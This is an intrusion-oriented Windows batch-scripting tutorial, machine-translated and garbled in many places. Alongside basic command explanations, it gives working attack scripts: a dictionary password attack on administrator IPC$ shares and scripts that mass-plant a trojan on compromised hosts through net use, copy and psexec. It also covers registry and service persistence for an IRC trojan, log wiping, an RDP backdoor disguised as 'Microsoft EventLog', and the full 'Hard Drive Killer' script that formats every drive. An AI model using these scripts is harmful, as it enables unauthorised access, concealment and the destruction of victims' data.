Foreword
Recently, for the discussion of batch technology, there are many good batch procedures release, but if there is no certain related knowledge, I am afraid it is not easy to understand and understand these batch files, but also can't talk about my hands-on, The ancient language: "It is better to teach people to fish." Because the online seems to have no more complete textbooks, I have written this picture for a little bit of a batch tutorial >> Give novice friends. Give all friends who have worked hard for the free and sharing of the network.
The batch file is a form of text file that contains one or more commands. Its file extension is .bat or .cmd. At the command prompt, the name of the approval file is submitted, or double-click the batch file, the system will call CMD.exe to run them one by one according to the order of each command in this file. Use batch files (also known as batch programs or scripts) to simplify daily or repetitive tasks. Of course, the main content of our version is to introduce some actual use in the invasion, such as the use of batch files to be mentioned later to make patch, bulk implant the latter procedures. Let's start our batch of learning trips.
1. Simple Batch Interior Command Introduction 1.echo command opens back or shut down request return function, or displays a message. If there is no parameters, the echo command will display the current echo setting. Syntax Echo [{ON | OFF}] [Message] Sample: @echo off / echo hello world In practical applications, we will combine this command and redirect symbol (also known as pipe symbol, generally> >> ^) To enable input some commands to a specific format. This will be reflected in the later examples.
2. The @ command indicates that the @ later command is not displayed during the intrusion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use. Sample: @echo off @echo now initializing the program ... @format x: / q / u / autoset (format This command can not use / y, the grateful is Microsoft left The parameter of Autoet gives us, the effects and / Y are the same.)
3.GOTO command specifies that the jump to the label. After finding the label, the program will process the command starting from the next row. Syntax: goto label (Label is the parameter, specifies the row in the batch program you want to turn.) Sample: if {% 1} == {} goto noparms if {% 2} == {} goto noparms (if IF here ,% 1,% 2, you don't understand, first jump, there will be detailed explanation. But it is best to make sense letters, let a letter before: It is used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions.
4.Rem Command Comment command, quite with / * in the C language -------- * /, which does not be executed, just a comment, easy to read and modify it later. Rem message sample: @Rem Here is The Description.
5.Pause command When running the pause command, the following message is displayed: press any key to contact :. sample: @echo off: begin copy a: *. * D: Back echo please put a new disk Into Driver a Pause Goto Begin In this example, all files on the disk in the drive A are copied to d: back. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing. 6.Call Command From a batch program to another batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line. Syntax Call [Drive:] [PATH] FILENAME [BATCHPARETERS] [: label [arguments] parameter [drive:} [path] filename Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.
The 7.start command calls an external program, all DOS commands and command line programs can be called by the start command. Intrusion Common Parameters: MIN Starting Window Minimizes Separate Separated Space In Separated Space Time 16 WINDOWS Program High In the High Priority Category Start Application RealTime Start the application WAIT launch application and wait for it to end Parameters These The application that is transmitted to the parameter executed by the command / program is a 32-bit GUI application, and the cmd.exe does not equal the application to the command prompt. If executed within the command script, the new behavior will not happen. 8.choice Command Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ..., such as: Choice / C: DME DEFRAG, MEM, END will display DEFRAG, MEM, END [D, M, E]? Sample: sample.bat is as follows: @echo off choice / C : DME DEFRAG, MEM, END IF ERRORLEVEL 3 GOTO DEFRAG (the value of the highest value first) IF Errorlevel 2 Goto Mem if Errotlevel 1 goto end
: DEFRAG C: Dosdefrag Goto end: Mem Mem Goto end: End echo good background
After this file runs, the DEFRAG, MEM, END [D, M, E]? The user can select DME, then the IF statement will make a judgment, and D represents the block segment executing the label DEFRAG, and M represents the program that is labeled MEM. Segment, e represents a block that executes the label End, and each block is finally jumped to the END Number with Goto End, and then the program will display good Bye and the file ends.
9.if Command
The if indicates whether it is determined whether or not the specified condition is determined to determine the execution of different commands. There are three formats: 1, if "==" String "The command parameter to be executed is equal to the specified string, the condition is established, run the command, otherwise run the next sentence. (Note is two equal numbers), such as if "% 1" == "a" Format A: if {% 1} == {} goto noparms if {% 2} == {} goto noparms2, if exist file name If the command is executed If there is a specified file, the condition is true, run the command, otherwise run the next sentence. If exist config.sys edit config.sys
3. If Errorlevel / if not errorlevel digitally peers to be executed If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence. If the IF ErrorLevel 2 Goto X2 DOS program is running, a number will return to DOS, called error code errorlevel or return code, common return code is 0, 1.
10.FOR command for command is a more complex command, primarily for parameters to perform commands within the specified range. When using the for command in the batch file, specify a variable, please use %% Variable
For {% Variable | %% Variable} in (SET) Do Command [CommandLineOptions]% variable specifies a single letter replaceable parameter. (SET) Specify one or a set of files. You can use wildcards. Command specifies the command to execute each file. Command-parameters specifies parameters or command line switches for a specific command. When using the for command in a batch file, specify the variable, please use %% Variable without using% Variable. The variable name is case sensitive, so% I is different from% i
If the command extension is enabled, the following additional for command format will be supported:
FOR / D% Variable in (SET) Do Command [Command-Parameters]
If the concentration contains a wildcard, specify matching with the directory name without matching the file name.
FOR / R [Drive:] Path]% Variable In (SET) Do Command [Command "
Check the directory tree in [Drive:] Path to the root, point to the for statement in each directory. If there is no specified directory after / r, use the current directory. If the set is only one single point (.) Character, the directory tree is enumerated.
FOR / L% Variable in (Start, Step, End) Do Command [Command-Para
This set represents a digital sequence from the beginning to the end in incremental form. Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will produce a sequence (5 4 3 2 1).
FOR / F ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") Do Command for / F ["options"]% variable in ('Command ') Do Command
Or, if there is a UseBackQ option:
FOR / F ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") Do Command for / F ["options"]% variable in ('Command ') Do CommandFileNameSet is one or more file names. Before proceeding to the next file in the filenameset, each file has been opened, read and processed. Processing includes reading a file, dividing it into a line of rows, and analyzing each line into zero or more symbols. The FOR cycle is then called with the resulting symbol string variable value. With the default, / f is separated from the first blank symbol of each line of each file. Skip blank lines. You can replace the default parsing operation by specifying an optional "Options" parameter. This band-quoted string includes one or more keywords that specify different parses options. These keywords are:
EOL = C - Refers to the end of a row of bet release characters (one) Skip = n - refers to the number of rows ignored at the beginning of the file. Delims = xxx - Indicator jacket set. This default separator set replaces the space and the jumping. Tokens = x, y, m-n - means which symbols per row are passed to each iteration for itself. This will result in a range of additional variable names. Specify the last character as an asterisk in the M symbol string via the NTH symbol, then the additional variable will assign and accept the reserved text of the row in the last symbol. Usebackq - Specify new grammar has been used under the case: Perform a back quotation string as a command and the quotation marks characters are text string commands and allow the dual quotes to expand the file name in Fi.
Sample1: for / f "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command
Will analyze each row in MyFile.txt, ignore those rows of the semicolon head, pass the second and third symbols in each row to the For program; with a tealeon and / or space delimited symbol. Note that the statement of this FOR program references% i to acquire the second symbol, reference% J to obtain the third symbol, refer to% K to get all the remaining symbols after the third symbol. For file names with spaces, you need to create files with double quotes. In this way, use dual quotes, you also need to use the UseBackQ option, otherwise, the dual quotation marks will be understood to be used as a string to define a certain analysis.
% i is specifically description in the For statement,% J and% K are specifically demonstrated by the tokens = option. You can specify up to 26 symbols via tokens =, as long as you do not seek a variable above the letter 'Z' or 'Z'. Keep in mind that for variables are single letters, case sensitive and global; at the same time, there is not more than 52 or more.
You can also use FOR / F analysis logic on adjacent strings; method is to enclose the filenameset between brackets with single quotes. Thus, the character serial will be regarded as a single input line in a file.
Finally, you can use the for / f command to analyze the output of the command. The method is to turn the filenameset between brackets into a hind string. This string will be regarded as a command line, pass to a sub-cmd.exe, and its output will be grasped into memory and is used as a file analysis. Therefore, the following examples:
FOR / F "USEBACKQ DELIMS =="% i in (`set`) do @echo% i
Will enumerate the name of the environment variable in the current environment.
In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following options for symptoms:
~ I - Delete any quotation marks ("), expand% i% ~ FI - expand% i to a fully qualified path name% ~ di - only expand% i to a drive number% ~ Pi - only% i expand Go to a path% ~ Ni - only expand% i to a file name% ~ xi - expand% i to a file extension name% ~ Si - the extension path only contains short name% ~ Ai - expand% i File of file attributes% ~ Ti - expand% i to file Date / time% ~ zi - to expand% i to file size% ~ $ PATH: i - Find the directory column of path environment variables and put% i Expanded the first fully qualified name. If the environment variable is not defined, or if the file is not found, this combination key will expand empty strings.
Multiple results can be combined to get multiple results:
% ~ DPI - expand% i to a drive letter and path% ~ NXI - expand% i to a file name and extension% ~ FSI - only expand% i to a full path name with a short name ~ DP $ PATH: I - Find the directory column in the path environment variable and expand% i to the found first drive letter and path. % ~ ftzai - expand% i to Dir from similar output lines
In the above example,% I and PATH can be replaced with other effective values. % ~ Syntax terminates with an effective FOR variable name. Select the larger write variable name similar to% I is more readily read, and avoid confusion with the combination of regardless of case.
The above is the official help of MS, let's take a few examples to specify the use of the for command in the invasion.
Sample2:
Use the for command to achieve the crack of violent password for a target Win2k host. We use NET USE / IPIPC $ "Password" / u: "administrator" to try this with the target host, and write a password when successful. The most important command is a: for / file% in (Dict.txt) Do Net USE / IPIPC $ "I%" / u: "administrator" uses I% to represent the password of Admin, in Dict.txt Take I % Value uses the NET USE command to connect. The program is then passed to find command - for / fi %% in (Dict.txt) Do Net USE / IPIPC $ "I %%" / u: "Administrator" | Find ": command successfully complete" >> D : ok.txt, so Ko.
Sample3:
Have you ever had a lot of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it.
The main order is only one: (when using the for command in the batch file, specify the variable using %% variable) @for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do Start Call door.bat %% I %% J %% k tokens Usage See Sample1 above, here it represents the parameter% I% J% K in door.bat in order. CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file. Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName. Code: --------------- Cut Here The Save As a Batchfile (i call it main.bat) ----------------- ---------- @ec "% 1" == "" goto usage @for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) DO START CALL IPCHACK.BAT %% I %% J %% K @goto end: usage @echo run this bath in dos mode.or Just double-click it.: end ------------- - Cut Here Then Save as a Batchfile (I Call it main.bat) ---------------------------
------------------- Cut hered (i call it door.bat) ----------------------------------------------------------------------------------------------------------------------------------- ------------- @NET USE /% 1IPC $% 3 / U: "% 2" @if erroorlevel 1 goto failed @echo trying to establish the ipc $ connection ............ ok @ Copy Windrv32.exe /% 1admin $ SYSTEM32 && IF Not Errorlevel 1 Echo IP% 1 User% 2 PWD% 3 >> Ko.txt @PSEXEC /% 1 C: WinntSystem32windrv32.exe @PSexec /% 1 Net Start Windrv32 &&ness NOT Errorlevel 1 Echo% 1 Backdooored >> Ko.txt: failed @echo sorry can not connect to the victim. ----------------- Cut Here The Save As a Batchfile (i call It door.bat) -------------------------------- This is just a prototype of automatic planting, two Batch and latte programs (Windrv32.exe), psexec.exe needs to be placed under the unified directory. Batch content can be extended, for example: add to clear log DDOS function, join the function of adding users, more deeper There is an automatic propagation function (worm). There are not many narratives here, interested friends can study themselves. II. How to use parameters in the batch batch in the batch file, generally from 1% to 9% this nine For a number of parameters, you need to move with Shift, which is not very common, we don't think about it. Sample1: fomat.bat @echo off if "% 1" == "a" format A:: format @format A: / q / u / auotset @echo please insert another disk to driver a. @pause @goto fomat This example Used in continuously format a few floppy disk, so you need to enter fomat.bat a at the DOS window, huh, it seems to have a bit drawing snake to add ~ ^ _ ^ Sample2: When we want to build an IPC $ Connect, you always need to enter a The big string command, it is noticeable, so we better write some fixed commands to a batch, put the broiler ip password username to assign the parameters to this batch, so you don't have to play each time. @echo off @NET USE / 1% IPC $ "2%" / u: "3%" Note Oh, this PASSWORD is the second parameter. @IF ERRORLVEL 1 Echo Connection Failed, use the parameter or simpler? You have learned to learn ^ _ ^.
3. How to use a combination command (Compound Command)
1.&
USAGE: The first command & second command [& Article 3 Commands ...]
Use this method to perform multiple commands at the same time, regardless of whether or not the command is successful
Sample: C:> DIR Z: & DIR C: EX4RCH The System Cannot Find The Path Specified. Volume In Drive C Has No Label. Volume Serial Number IS 0078-59FBDIRECTORY OF C: EX4RCH
2002-05-14 23:51
2.&&
USAGE: The first command && second order [&& Article 3 Commands ...]
In this way, multiple commands can be performed simultaneously. When you encounter an error, you will not perform the back command, if there is no error, you have been executed all commands;
Sample: C:> DIR Z: && Dir C: Ex4rch The system cannot find the path specified.
C:> DIR C: EX4RCH && Dir Z: Volume In Drive C Has No Label. Volume Serial Number IS 0078-59FB
Directory of C: EX4RCH
2002-05-14 23:55
This command can be used in this order when doing backup, such as: Dir file: //192.168.0.1/database/backup.mdb && copy file: //192.168.0.1/DATABASE/Backup.mdb E: Backup If there is a backup.mdb file on the remote server, the copy command is executed if it does not exist that the copy command is not executed. This usage can be replaced if exist :)
3. ||
USAGE: The first command || Second order [|| Article 3 Commands ...]
In this way, multiple commands can be performed simultaneously. When you encounter the correct command, you will not execute the back command. If you do not have a correct command, you have been executed all commands;
Sample: C: EX4RCH> DIR SOMETIPS.GIF || Del Sometips.gif Volume In Drive C Has No Label. Volume Serial Number IS 0078-59FB
Directory of C: EX4RCH
2002-05-14 23:55 14 Sometips.gif 1 file (s) 14 bytes 0 dir (s) 768, 696, 320 bytes free
Examples of combined commands: sample: @copy Trojan.exe /% 1admin $ system32 && if not errorlevel 1 echo ip% 1 user% 2 pass% 3 >> Victim.txt
Fourth, the use of pipeline orders
1. | Command USAGE: First Commands | Second Order [Article 3 Commands ...] Use the results of the first command as the parameters of the second command, remember this in Unix is very common.
Sample: Time / Et>D: iP.log NetStat -n -p TCP | Find ": 3389" >> D: IP.log start expedition? Used for Terminal Services Allows us to customize the starting program for users to achieve the following BAT to get the IP of the login user. 2. >> Output Redirection command Redirects a command or an output result of a program to a specific file,> and >> Differences in>> Write the specified file after the contents in the file And >> Only the content will be added to the specified file without changing the content.
Sample1: Echo Hello World> C: Hello.txt (stupid example?)
Sample2: When the DLL Trojan is prevalent, we know that SYSTEM32 is a good place to hide and seek. Many Trojans have turned their heads there. The DLL horse is no exception. For this, we can install the system and necessary applications, EXE and DLL files in this directory make a record: Run the CMD - Conversion Directory to System32 - Dir * .exe> EXEBACK.TXT & DIR * .DLL> DLLBACK.TXT, so all EXE and DLL files are named In EXEBACK.TXT and DLLBACK.TXT, if you find an exception, you can't find a problem with the traditional method, you should consider whether it has sousered in the DLL Trojan. At this time, we use the same order to use the SYSTEM32 The lower exe and dll files are recorded in additional exeback1.txt and dllback1.txt, then run: CMD - FC EXEBACK.TXT EXEBACK1.TXT> Diff.txt & FC DLLBACK.TXT DLLBACK1.TXT> DIFF.TXT. ( Compare the DLL and EXE files before and after using the FC command, and enter the result into Diff.txt) so that we can find some of the more DLL and EXE files, and then pass the creation time, version, whether it is compressed, etc. It is easier to determine whether it has been patron with DLL Trojans. No, if there is any words, don't drop it directly, first use the regsvr32 / u trojan.dll to remove the back door DLL file, move it to the recycle station, if the system does not exception reflection, then completely delete or Submit to anti-virus software.
3. <,> &, <&
5. How to use the batch file to operate the registry
Implement a certain purpose of the specific key value of the operation registry during the intrusion process, for example, in order to reach the hidden back door, the Trojan deletes the residual key value under RUN. Or create a service to load the back door. Of course, we will also modify the registry to reinforce the system or change an attribute of the system, which requires us to have a certain understanding of the registry operation. Let's take a look at how to use the .reg file to operate the registry. (We can use batch to generate a REG file) About the operation of the registry, common is to create, modify, delete.
1. Create creation is divided into two kinds, one is to create children (Subkey)
We create a file, the content is as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMICROSOFTHACKER]
Then execute this script, you have created a child name "HACKER" under HKEY_LOCAL_MACHINESOFTWaremicrosoft.
The other is to create a project name that this file format is a typical file format, which is consistent with the file format you exported from the registry, the content is as follows: Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN] "Invader" = "ex4rch" "door" = c: /winnt/system32/door.exe "autodos" = DWORD: 02
This is new in [HKEY_LOCAL_MACHINESOFTWARMICROSOFTWINDOWSCURRENTVERSIONRUN]: Invader, Door, About These three projects INVADER type is "String Value" Type is "Reg Sz Value" Autodos type is "DWord Value"
2. Modify modification is relatively simple, just export you to the project you need to modify, then modify it with Notepad, then import (regedit / s).
3. Delete let us first say to delete a project name, we create a file as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN] "EX4RCH" = -
Execute this script, "EX4RCH" under [HKEY_LOCAL_MACHINESOFTWAREMICROFTWINDOWSCURRENTVERSIONRUN] is deleted;
Let's take a look at the delete one child, we create a script as follows:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN]
Execute this script, [HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN] has been deleted.
I believe it is .reg files you have already mastered. Then the current goal is to use batch to create a .reg file, remember that our previous use of redirect symbols can easily create specific types of files.
Samlpe1: As the example above, if you want to generate the following registry file Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN] "Invader" = "ex4rch" "door" = HEX: 255 "autodos" = dword: 000000128 only like this: @echo windows registry editor version 5.00 >> Sample.REG
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]> Sample.reg @echo "Invader" = "Ex4rch" >> Sample.reg @echo "door" = 5 >> C: /WINNT/system32/door.exe >> Sample.reg @echo " Autodos "= DWORD: 02 >> Sample.Regsamlpe2: We now use some old Trojans, you may generate a key value to realize the Trojan Start. But this is easy to expose the path to Trojans, causing the Trojan to be killing, relatively safe relative to the registration of Trojans as a system service. Below to configure the IRC Trojan DSNX as an example (named Windrv32.exe ) @start windrv32.exe @attrib h r windrv32.exe @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >> patch.dll @echo "windsnx" = - >> patch.dll @ sc.exe create Windriversrv type = kernel start = auto displayname = WindowsDriver BinPath = C: WinntSystem32windrv32.exe @Regedit / s Patch.dll @delete Patch.dll
@REM [Delete the startup item in the registry in the registry, and the SC.exe will be registered as the system key service, set its properties to hide and read only, and config is started from start] @Rem is not safer ^ _ ^.
Six. Wonderful instances are delivered. 1. Delete the Batch of Win2K / XP System Default Sharing ------------------------ Cut Here the Save as .bat or .cmd file --- ---------------------------------------------------------------------------------------------------------------------------------------
@echo prepaling to delete all the default shares.when @pause @echo off
: Rem check parameters if null show usage. If {% 1} == {} goto: usage
: Rem code start. Echo. Echo ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------ Echo. Echo Now deleding all the default shares. Echo. Net Share% 1 $ / Delete Net Share% 2 $ / Delete Net Share% 4 $ / Delete Net Share% 4 $ / Delete Net Share% 6 $ / Delete Net Share% 7 $ / Delete Net Share% 8 $ / Delete Net Share% 9 $ / Delete Net Stop Server Net Start Server Echo. Echo All The Shares Have Been deleteed echo. echo --------------------------------------------- . --------- echo echo Now modify the registry to change the system default properties echo echo Now creating the registry file echo Windows Registry Editor Version 5.00> c:.. delshare.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >> c : delshare.reg echo "AutoShareWks" = dword: 00000000 >> c: delshare.reg echo "AutoShareServer" = dword: 00000000 >> c: delshare.reg echo Nowing using the registry file to chang the system default properties regedit / sc. : DELSHARE.REG Echo Deleting The Temprotarily Files. de L C: Delshare.reg Goto: End
: USAGE Echo. Echo --------------------------------------------- --------- Echo. Echo ☆ A Example for Batch File ☆ Echo ☆ [Use Batch File to Change The Sysytem Share Properties.] ☆ Echo. Echo Author: EX4RCH Echo mail: EX4RCH@hotmail.com QQ: 1672602 echo echo Error:.. not enough parameters echo echo ☆ Please enter the share disk you wanna delete ☆ echo echo For instance, to delete the default shares:.. echo delshare cde ipc admin print echo echo If the disklable is not as C : D: E:, please call itself. Echo. Echo Example: Echo if Locak Disklable Are C: D: E: x: Y: Z: YOULD Chang CHEXYZYZ IPC Admin Print Echo. Echo *** You can delete nine shares overca. Echo ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------- Goto: EOF: End Echo. Echo ---------------------------------------------------------------------------------------------------------- -------------------------------- Echo. Echo Ok, Delshare.bat Has Deleted All the Share You Assigned. Echo.ny Questions, Feel Free To Mail To EX4RCH@hotmail.com. Echo Echo. E CHO ----------------------------------------------------------------- ----- Echo.
: EOF Echo end of the batch file ------------------------ Cut here the save as .bat or .cmd file ------- --------------------
2. Comprehensive reinforcement system (giving meat chicken patch) batch document ---------------------- Cut here the Save as .bat or .cmd file ---------------------------
@echo windows registry editor version 5.00> Patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVICESLANSERVERVERVERVERVERVERVERPARETERS] >> Patch.dll
@echo "autoshareserver" = dword: 00000000 >> Patch.dll @echo "autosharewks" = dword: 00000000 >> Patch.dll @Rem [forbidden sharing]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >> patch.dll @echo "restrictanonymous" = dword: 00000001 >> patch.dll @REM [prohibit anonymous login] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >> patch.dll @echo "SMBDeviceEnabled" = dword: 00000000 >> Patch.dll @REM [Disable and File Access and Print Sharing]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices @ REMoteRegistry] >> patch.dll @echo "Start" = dword: 00000004 >> patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >> patch.dll @echo "Start" = dword: 00000004 >> patch.dll @echo [HKEY_LOCAL_MACHINESOFTWAREMICROFTWINDOWS NTCURRENTVERSIONWINLOGON] >> Patch.dll @echo "shutdownwithoutlogon" = "0" >> Patch.dll @Rem [Forbidden to shut down before login]
@echo "dontdisplaylastusername" = "1" >> patch.dll @rem [forbidden to display the previous login user name] @Regedit / s patch.dll
------------------------ Cut Here the Save as .bat or .cmd file --------------- ----------------
The following command is to clear all the logs of broilers, prohibit some dangerous services, and modify the Terminnal Service leaving the broiler. @regedit / s patch.dll @net stop w3svc @net stop event log @del c:. winntsystem32logfilesw3svc1 * * / f / q @del c:. winntsystem32logfilesw3svc2 * * / f / q @del c: winntsystem32config * .event / f / Q @del c: Winntsystem32dtclog *. * / f / @del c: winnt * .txt / f / @del c: winnt * .log / f / @NET Start W3SVC @NET Start Event log @rem [ Delete log]
@NET Stop lanmanserver / y @NET Stop Schedule / Y @Net Stop RemoteRegistry / Y @Del patch.dll @echo the server hass. @del patch.bat @Rem [Some dangerous services are forbidden. ]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >> patch.dll @echo "PortNumber" = dword: 00002010 >> patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >> patch.dll @echo "PortNumber" = dword: 00002012 >> patch. dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >> patch.dll @echo "Start" = dword: 00000002 >> patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >> patch.dll @echo "Start" = dword: 00000002 >> patch.dll @ Echo "ErrorControl" = dword: 00000001 >> Patch.dll @echo "imagepath" = HEX (2): 25, 00, 53, 00, 79, 00, 73, 3, 74, 100, 65, 6D, 00, 52, 100, 6F, 00, 6F, 00, >> Patch.dll @echo 74, 00, 25, 00, 5C, 00, 53, 00, 79, 3, 73, 00, 74, 100, 65 00, 6D, 00, 33, 00, 32, 100, 5C, 00, 65, >> Patch.dll @echo 00, 76, 100, 65, 100, 6E, 00, 74, 100, 6C, 00, 6F, 00, 67, 00, 2E, 00, 65, 3, 78, 100, 65, 100, 00 >> Patch.dll @echo "objectname" = "localsystem" >> patch.dll @echo "Type "= DWORD: 00000010 >> Patch.dll @echo" description "=" Keep Record of the program and Windows' message. ">> patch.dll @echo" DisplayName "=" Microsoft EventLog ">> patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >> patch.dll @echo" Start "= dword: 00000004 >> patch.dll @copy c: winntsystem32termsrv .exe c: winntsystem32eventlog.exe @Rem [Modify 3389 connection, port is 8210 (hexadecimal 00002012), name is Microsoft EventLog, leaves the road]
3.hard Drive Killer Pro Version 4.0 (playing batch to this level is not easy.) ------------------------ Cut here the SAVE as. bat or .cmd file --------------------------- @echo off rem this program is dedecated to a very special person trata not Want to be named.: start cls echo please wait while program loads... Call attrib -r -hc: autoexec.bat> Nul echo @echo off> C: Autoexec.Bat Echo Call Format C: / q / u / autosample > nul >> c: autoexec.bat call attrib r hc: autoexec.bat> nul rem Drive checking and assigning the valid drives to the drive variable.set drive = set alldrive = cdefghijklmnopqrstuvw xyz
rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory. rem As far as the drive detection and drive variable settings, do not worry about how it rem works, it's d * amn to Complicated for the average or even the Expert Batch Programmer. Rem Except for Tom Lavedas.
Echo @echo off> drivechk.bat echo @Prompt %%%% COMSPEC %%%% / f / c vol %%% 1: $ b Find "Vol"> NUL> {t} .bat% COMSPEC% / E : 2048 / c {t} .bat >> Drivechk.bat del {t} .bat echo if Errorlevel 1 Goto Enddc >> Drivechk.bat
CLS echo please wait while program loads..
Rem When Errorlevel IS 1, THE The Above Is Not True, IF 0, THEN'S TRUE. REMOPPOSITE OF Binary Rules. If 0, IT WILL ELAPS TO The Next Command.
Echo @Prompt %%%% COMSPEC %%%% / F / C DIR %%%% 1: ./ AD / W / -P $ b Find "Bytes"> NUL> {T} .bat% COMSPEC% / E : 2048 / c {t} .bat >> Drivechk.bat del {t} .bat echo if Errorlevel 1 Goto Enddc >> Drivechk.bat
CLS echo please wait while program loads..
Rem if Errorlevel IS 1, THE DRIVE SPECified IS A Removable Media Drive - Not Ready. Rem if Errorlevel IS 0, THEN IT WILL ELAPS To The next command.echo @Prompt Dir %%% 1: ./ AD / W / -p $ b Find "0 Bytes Free"> NUL> {t} .bat% COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat del {t} .bat echo if Errorlevel 1 set drive = %% DRIVE %% %% 1 >> Drivechk.bat
CLS echo please wait while program loads..
Rem if it's error. Rem if it's not error. Rem if it's not errorlevel 1, The specified drive.
Echo: Enddc >> Drivechk.bat
Rem Drive Checking Insertion Ends Here. "Enddc" Stands for "End DDRIVE CHECKING".
Rem now We will use the program drivechk.bat to attain valid drive information.
: SampledRV
For %% a in (% alldrive%) Do call drivechk.bat %% a> Nul del DRIVECHK.BAT> NUL IF% drive. ==. set drive = c
: Form_del call attrib -r -hc: autoexec.bat> nul echo @echo off> c: autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system >> c:... Autoexec.bat echo for% %%% a in (% drive%) Do Call Format %%%% A: / Q / U / AutoSample> NUL >> C: Autoeexec.Bat Echo CLS >> C: Autoexec.Bat Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: AutoExec.bat Echo for %%%% A in (% Drive%) Do Call C: Temp.bat %%%% A Bunga> NUL >> C: AutoExec. Bat Echo CLS >> C: Autoexec.Bat Echo Echo Loading Windows, Please WiT While Microsoft Windows Recovers Your System... >> C: AutoExec.Bat Echo for %%%A in (% Drive%) Call Deltree / Y %%%% A:> NUL >> C: AutoExec.Bat Echo CLS >> C: Autoexec.Bat Echo Echo Loading Windows, please wait while Microsoft Windows Recovers Your System... >> C: AutoExec.Bat echo for% %%% a in (% drive%) Do Call Format %%%% A: / Q / U / AutoSample> NUL >> C: Autoeexec.Bat Echo CLS >> C: Autoexec.Bat Echo Echo Loading Windows, please Wait While Microsoft Windows recovers your system.. >> C: autoexec.bat echo for %%%% a in (% drive%) Do Call C: Temp.bat %%%% a bunga> NUL >> C: Autoexec.Bat Echo CLS >> C: Autoexec.Bat Echo Echo loading windows, please wait while Microsoft Windows Recovers your system.. >> C: autoexec.bat echo for %%%A in (% drive%) Call deltree / Y %% %% A:> NUL >> C: AutoExec.Bat Echo CD >> C: Autoexec.Bat Echo CLS >> C: Autoexec.Bat Echo Echo Welcome To The Land of Death. Munga Bunga's Multiple Hard Drive Killer Version 4.0.> >
C: autoexec.bat echo echo if you ran this file, the Sorry, I Just Made it. The purpose of this program is to tell you the following... >> C: autoexec.bat echo echo 1. To make people aware That Security Should Not Be Taken for Grand. >> C: Autoexec.Bat Echo Echo 2. Love Is Important, IF you have it, truly, don't let go of it like i did! >> c: autoexec.bat echo Echo 3. if you are not a vegetarian, the you are a murderr, and i'm glad your hd is dead. >> C: Autoexec.Bat Echo Echo 4. Don n't support The Following: War, Racism, Drugs and The LibERAL PARTY. >> C: Autoexec.Bat echo. >> C: Autoexec.Bat echo echo regards, >> C: autoexec.bat echo echo. >> C: autoexec.bat echo echo monga bunga >> C: autoexec . bat call attrib r HC: Autoexec.bat
